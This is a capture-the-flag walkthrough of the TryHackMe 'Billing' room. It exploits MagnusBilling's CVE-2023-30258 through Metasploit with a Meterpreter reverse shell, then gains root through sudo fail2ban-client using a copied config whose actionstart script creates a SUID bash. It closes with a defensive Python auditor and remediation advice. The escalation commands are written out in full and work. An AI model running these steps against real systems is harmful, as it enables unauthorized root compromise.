# Billing

{% embed url="https://tryhackme.com/room/billing" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Recon

We start with an Nmap scan and find four open ports. Among them are a web server on port `80`, a MariaDB service on port `3306` and the Asterisk Call Manager (the Asterisk Manager Interface) on port `5038`.

<figure><img src="/files/NAlGyMcSR6k0z3KrvwsB" alt=""><figcaption></figcaption></figure>

From the default script scan, we can also see the content of robots.txt, which has a disallowed entry for the `/mbilling` directory.

```
| http-robots.txt: 1 disallowed entry 
|_/mbilling/
```

Visiting the directory brings up a login page, and the page title reveals the product name `MagnusBilling`.

```
http://billing.thm/mbilling/ 
```

<figure><img src="/files/o2vtKB1CrW79pHUMRwn1" alt=""><figcaption></figcaption></figure>

A short search shows that MagnusBilling is an open-source VoIP billing and management system for managing SIP trunks, VoIP calls and customer billing; it provides tools for call routing, monitoring and invoicing.

<figure><img src="/files/CsJ5KX0NG9MXNWNqDZQb" alt=""><figcaption></figcaption></figure>

## Shell As asterisk

MagnusBilling has an unauthenticated remote command execution vulnerability, `CVE-2023-30258`, for which a manual exploit exists and which is also covered by a module in the Metasploit framework.

{% embed url="https://www.rapid7.com/db/modules/exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258/" %}

We set up the exploit in the Metasploit framework and give it a try.

```
└─$ msfconsole 
[...]

       =[ metasploit v6.4.0-dev                           ]
+ -- --=[ 2405 exploits - 1239 auxiliary - 422 post       ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search magnus

Matching Modules
================

   #  Name                                                        Disclosure Date  Rank       Check  Description
   -  ----                                                        ---------------  ----       -----  -----------
   0  exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258  2023-06-26       excellent  Yes    MagnusBilling application unauthenticated Remote Command Execution.
   1    \_ target: PHP                                            .                .          .      .
   2    \_ target: Unix Command                                   .                .          .      .
   3    \_ target: Linux Dropper                                  .                .          .      .


Interact with a module by name or index. For example info 3, use 3 or use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
After interacting with a module you can manually set a TARGET with set TARGET 'Linux Dropper'

msf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > show options

Module options (exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h
                                         tml
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /mbilling        yes       The MagnusBilling endpoint URL
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0
                                       .0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


   When TARGET is 0:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   WEBSHELL                   no        The name of the webshell with extension. Webshell name will be randomly generated if left unset.


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set LHOST 10.14.90.235
LHOST => 10.14.90.235
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set RHOST billing.thm
RHOST => billing.thm
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run

```

We get a shell and are the user `asterisk`.

<figure><img src="/files/TLwPODJDv9AeujGnghk4" alt=""><figcaption></figcaption></figure>

Since I am not very familiar with the Metasploit framework and prefer a shell I can upgrade to a full TTY, we start a second listener and spawn a plain reverse shell from the Meterpreter session.

<figure><img src="/files/YnxItz3kyu9yK1Uw7gLW" alt=""><figcaption></figcaption></figure>

To upgrade the shell, we follow the instructions provided here:

{% embed url="https://0xffsec.com/handbook/shells/full-tty/" %}

<figure><img src="/files/2Rlzx5FGythawVlw5p7D" alt=""><figcaption></figcaption></figure>

We find another user, `magnus`, in `/etc/passwd`. We have access to that user's home directory and can read the user flag there.

<figure><img src="/files/zDQn6A7pWrnN1HCYsSV7" alt=""><figcaption></figcaption></figure>

## Shell As root

As `asterisk`, we can run `sudo -l` without a password, and it shows that we are allowed to execute `/usr/bin/fail2ban-client` as root.

Fail2ban is a security tool that monitors log files for suspicious activity and blocks IP addresses after repeated failed login attempts. It helps protect servers from brute-force attacks by automatically adding firewall rules.

<figure><img src="/files/WLYbWwHzTAmkockspW4m" alt=""><figcaption></figcaption></figure>

The following resource describes several ways this can be abused to escalate privileges.

{% embed url="https://juggernaut-sec.com/fail2ban-lpe/" %}

There you can find an approach that customizes a config in the configuration directory and places a command in it that is then executed with root permissions. Unfortunately, we only have read-only access to the directory...

```
/etc/fail2ban
```

<figure><img src="/files/E0KnP9Tcvo4lwXFPEcqL" alt=""><figcaption></figcaption></figure>

... and its contents.

<figure><img src="/files/Lfk4VqbiGqBZuebebudL" alt=""><figcaption></figcaption></figure>

But we can work around this. We copy the configuration directory somewhere writable and point `fail2ban-client` at the copy: its `-c` option sets the **configuration directory** it reads. The `fail2ban-server` it talks to runs as root and executes the commands defined in the action configuration, so any command we place in our copy runs with root privileges.

```
sudo fail2ban-client -c /tmp/fail2ban/ -v restart
```

With `rsync -av /etc/fail2ban/ /tmp/fail2ban/` we recursively copy the contents of `/etc/fail2ban/` to `/tmp/fail2ban/`.

```
rsync -av /etc/fail2ban/ /tmp/fail2ban/
```

We can then follow the "Exploiting Fail2Ban and Getting a Root Shell" section of `https://juggernaut-sec.com/fail2ban-lpe/` and customize `action.d/iptables-multiport.conf` before restarting the service, or write our own config.

With the following we write our own action and jail: the action's `actionstart` hook runs a script that copies `/bin/bash` to `/tmp/bash` and sets the SUID bit on it, which gives us a root shell.

```
# Working copy of the fail2ban configuration in a directory we can write to
rsync -av /etc/fail2ban/ /tmp/fail2ban/

# Payload: run by the root fail2ban server, it leaves a SUID copy of bash behind
cat > /tmp/script <<EOF
#!/bin/sh
cp /bin/bash /tmp/bash
chmod 755 /tmp/bash
chmod u+s /tmp/bash
EOF
chmod +x /tmp/script

# Action definition whose actionstart hook is our script
cat > /tmp/fail2ban/action.d/custom-start-command.conf <<EOF
[Definition]
actionstart = /tmp/script
EOF

# Jail that uses the action (appended to the copied jail.local)
cat >> /tmp/fail2ban/jail.local <<EOF
[my-custom-jail]
enabled = true
action = custom-start-command
EOF

# Every jail needs a filter; an empty definition is enough here
cat > /tmp/fail2ban/filter.d/my-custom-jail.conf <<EOF
[Definition]
EOF

# Restart fail2ban as root using our copied configuration directory
sudo fail2ban-client -c /tmp/fail2ban/ -v restart
```

Once the restart has run, `/tmp/bash` is a SUID root binary; running `/tmp/bash -p` keeps the effective UID and drops us into a `root` shell. We then find the root flag at `/root/root.txt`.

<figure><img src="/files/IkBN4sPZh4f932IojTSb" alt=""><figcaption></figcaption></figure>
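As an added check that is not part of the original write-up or of the MagnusBilling or fail2ban projects, the following Python script audits a fail2ban configuration directory the way a defender (or an attacker inspecting their own staging copy) would: it parses every action under `action.d/`, extracts the program that each executable field (`actionstart`, `actionban`, ...) would launch as root, and flags anything that does not live under a system binary directory. It also maps the enabled jails in a `jail.local` to the action they reference. The two action files and the `jail.local` it writes to a temporary directory are constructed for this example, the trusted-prefix list is an assumption, and `[INCLUDES]` are not followed, so a tag defined only in an included file is reported as unresolved rather than guessed.

```python
"""Audit fail2ban action definitions for programs that fail2ban-server (which
runs as root) would execute from untrusted locations.

Added example for this write-up; not code from MagnusBilling, fail2ban or the
original post. Sample configs below are constructed to mirror the files the
escalation uses."""
import configparser
import os
import shlex
from typing import Dict, List, Tuple

# Keys of an action's [Definition] section whose values fail2ban-server executes.
EXEC_FIELDS = ("actionstart", "actionstop", "actioncheck",
               "actionban", "actionunban", "actionflush")
# Where a packaged action is expected to launch programs from (assumption).
TRUSTED_PREFIXES = ("/usr/sbin/", "/usr/bin/", "/sbin/", "/bin/")

Finding = Tuple[str, str, str]  # (field, program, verdict)


def _load(text: str) -> configparser.ConfigParser:
    # fail2ban files are INI with multi-line values and <tag> references;
    # interpolation is off so '%' or '<' in commands are kept verbatim.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return cp


def _resolve_program(cp: configparser.ConfigParser, command: str) -> str:
    """First program of the first non-empty command line, expanding a leading
    <tag> against [Definition]/[Init] a few times (included files not loaded)."""
    line = next((l.strip() for l in command.splitlines() if l.strip()), "")
    head = ""
    for _ in range(5):
        try:
            tokens = shlex.split(line)
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            tokens = line.split()
        if not tokens:
            return ""
        head = tokens[0]
        if not (head.startswith("<") and head.endswith(">")):
            return head
        value = None
        for section in ("Definition", "Init"):
            if cp.has_option(section, head[1:-1]):
                value = cp.get(section, head[1:-1])
                break
        if value is None:
            return head  # defined in an included file we did not load
        line = value + " " + " ".join(tokens[1:])
    return head


def audit_action(text: str) -> List[Finding]:
    """Classify every executable field of one action definition."""
    cp = _load(text)
    findings: List[Finding] = []
    if not cp.has_section("Definition"):
        return findings
    for field in EXEC_FIELDS:
        if not cp.has_option("Definition", field):
            continue
        prog = _resolve_program(cp, cp.get("Definition", field))
        if not prog:
            continue
        if prog.startswith("<"):
            verdict = "unresolved tag"
        elif prog.startswith("/"):
            verdict = "trusted path" if prog.startswith(TRUSTED_PREFIXES) else "untrusted path"
        else:
            verdict = "unqualified name (resolved via fail2ban-server PATH)"
        findings.append((field, prog, verdict))
    return findings


def is_suspicious(findings: List[Finding]) -> bool:
    return any(v == "untrusted path" for _, _, v in findings)


def enabled_jail_actions(jail_text: str) -> Dict[str, str]:
    """Map each enabled jail to the action name it references (text before '[')."""
    cp = _load(jail_text)
    out: Dict[str, str] = {}
    for jail in cp.sections():
        if cp.getboolean(jail, "enabled", fallback=False) and cp.has_option(jail, "action"):
            first = cp.get(jail, "action").strip().splitlines()[0]
            out[jail] = first.split("[", 1)[0].strip()
    return out


def audit_config_dir(config_dir: str) -> Dict[str, List[Finding]]:
    """Audit every action under <config_dir>/action.d (e.g. a dir given to -c)."""
    action_dir = os.path.join(config_dir, "action.d")
    results: Dict[str, List[Finding]] = {}
    for name in sorted(os.listdir(action_dir)):
        if name.endswith((".conf", ".local")):
            with open(os.path.join(action_dir, name), encoding="utf-8") as fh:
                results[name] = audit_action(fh.read())
    return results


# Constructed sample shaped like a packaged iptables action; the [Init] value
# stands in for what iptables-common.conf would normally provide.
BENIGN_ACTION = """\
[INCLUDES]
before = iptables-common.conf

[Init]
iptables = iptables <lockingopt>

[Definition]
actionstart = <iptables> -N f2b-<name>
              <iptables> -A f2b-<name> -j <returntype>
actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>
actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>
"""

# Constructed sample with the shape of the action used for the escalation.
ROGUE_ACTION = """\
[Definition]
actionstart = /tmp/script
"""

# Constructed jail.local: one packaged jail plus the rogue one.
JAIL_LOCAL = """\
[DEFAULT]
enabled = false

[sshd]
enabled = true
action = iptables-multiport[name=sshd, port=ssh]

[my-custom-jail]
enabled = true
action = custom-start-command
"""


def main() -> None:
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "action.d"))
        for name, body in (("iptables-multiport.conf", BENIGN_ACTION),
                           ("custom-start-command.conf", ROGUE_ACTION)):
            with open(os.path.join(tmp, "action.d", name), "w", encoding="utf-8") as fh:
                fh.write(body)
        jails = enabled_jail_actions(JAIL_LOCAL)
        for fname, findings in audit_config_dir(tmp).items():
            used_by = [j for j, a in jails.items() if a + ".conf" == fname]
            flag = "SUSPICIOUS" if is_suspicious(findings) else "ok"
            print(f"{fname}: {flag}; used by jails {used_by}")
            for field, prog, verdict in findings:
                print(f"  {field} -> {prog} ({verdict})")


if __name__ == "__main__":
    main()
```

Pointed at the copied tree from the escalation above (`audit_config_dir("/tmp/fail2ban")`), the script flags `custom-start-command.conf` because its `actionstart` launches `/tmp/script`. The durable fix is not to grant `sudo` on `fail2ban-client` to a service account at all: any sudoers rule that still lets the user pass `-c` (for example one with a wildcard in the argument spec) hands over the whole configuration, and with it root command execution.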

